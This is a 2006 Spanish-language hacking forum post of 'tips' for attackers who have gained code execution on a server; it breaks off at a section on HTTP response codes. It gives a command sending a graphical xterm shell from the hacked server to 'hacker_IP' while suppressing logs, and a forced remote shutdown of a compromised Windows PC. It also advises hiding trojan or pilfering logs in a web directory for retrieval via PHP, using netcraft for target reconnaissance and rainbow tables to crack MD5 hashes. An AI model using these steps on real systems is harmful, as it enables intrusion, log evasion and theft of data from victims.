Test Foro de elhacker.net SMF 2.1

Informática => Tutoriales - Documentación => Mensaje iniciado por: s0cratex en 11 Marzo 2006, 21:15 PM

Título: Tip's.
Publicado por: s0cratex en 11 Marzo 2006, 21:15 PM
[ .tip 1. xterm ]
------------------
Al conseguir un remote code execution o una shell ejecutamos lo siguiente para que el servidor hackeado nos devuelva una pantalla gráfica de la shell, claro nosotros debemos de tener una terminal X, eso no es mas que un linux con interfaz gráfica, cualquier live_cd linux funciona. (ej: whax)
------------------------------------------------------------------------
xterm -ut -display hacker_IP:0.0
------------------------------------------------------------------------
xterm -> comando
-ut -> no dejar logs
-display -> que aparezca en
hacker_IP -> Esta no necesariamente es la IP puede ser una direccion no_ip.
------------------------------------------------------------------------



[ .tip 2. downloader ]
------------------------

Cuando tengamos que descargar muxas cosas. Podemos hacernos del siguiente script para conseguirlo, ahora solo tenemos que meter el listado de direcciones y listo.

------------------------------------------------------------------------
#!/usr/bin/perl -w

# Note: You also need the file [dloadlist.txt] in the same directory
# containing the list of files you wish to download on separate lines e.g.

# [dloadlist.txt]
# http://www.domain_name.com/file1.htm
# http://www.domain_name.com/file2.htm
# http://www.domain_name.com/file3.htm

#==========================================================================
#####################Variables#####################
$dload_list_file = "dloadlist.txt";
#####################Variables#####################

open(DAT,"$dload_list_file");
@raw_data = <DAT>;
close(DAT);

foreach $line ( @raw_data) {
    chop($line);
    ($file_to_dload)=split(/\n/,$line);

    system("lwp-download $file_to_dload");
}
------------------------------------------------------------------------



[ .tip 3. shutwin ]
--------------------


Al entrar a un windows con el siguiente comando apagamos el PC, esto se anula con shutdown -a.
------------------------------------------------
shutdown -s -f -t 15 -c "bye"
------------------------------------------------

[ .tip 4. Aprovechar las webs ]

------------------------------------------------
La web www.netcraft.com nos puede dar muxa información acerca de un objetivo.
------------------------------------------------
------------------------------------------------
La web www.gdataonline.com tiene raibowtables hasta de varios gb's asi que crackear un md5, será rapido alli.
------------------------------------------------
------------------------------------------------
Al momento de dejar un troyano o cualquier utilería de pilfering que deje logs, es posible obtener los logs desde el web
por medio de scripts que lean el contenido de un archivo y ocultandolo en el directorio del web, en php con show_source()
por ejemplo.



[ .tip 5. http responses ]
--------------------------


1. Respuestas del server
------------------------
Cuando conectamos con un servidor http y hacemos una consulta, ya sea desde un navegador o desde un terminal, el servidor
respóndera con ciertos codigos, el mas común 404: